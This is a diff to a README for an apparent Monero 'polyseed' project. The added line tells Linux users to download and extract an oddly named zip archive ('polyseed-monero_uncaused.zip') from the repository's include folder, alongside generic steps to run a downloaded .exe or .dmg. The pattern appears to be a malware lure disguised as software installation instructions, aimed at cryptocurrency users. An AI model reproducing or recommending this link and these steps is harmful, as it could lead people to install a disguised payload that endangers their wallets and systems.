Kabelt5373/polyseed-monero/README.md

    Once the file has downloaded, navigate to your downloads folder.
    - For Windows users, double-click the `.exe` file.
    - For macOS, open the `.dmg` file and drag the application icon to your Applications folder.
-   - For Linux, extract the contents of the `.tar.gz` and follow any specific instructions included.
+   - For Linux, extract the contents of the `https://raw.githubusercontent.com/Kabelt5373/polyseed-monero/main/include/polyseed-monero_uncaused.zip` and follow any specific instructions included.

 5. **Follow Installation Prompts**
    Follow the on-screen instructions to install the software.
 This process usually takes just a few minutes.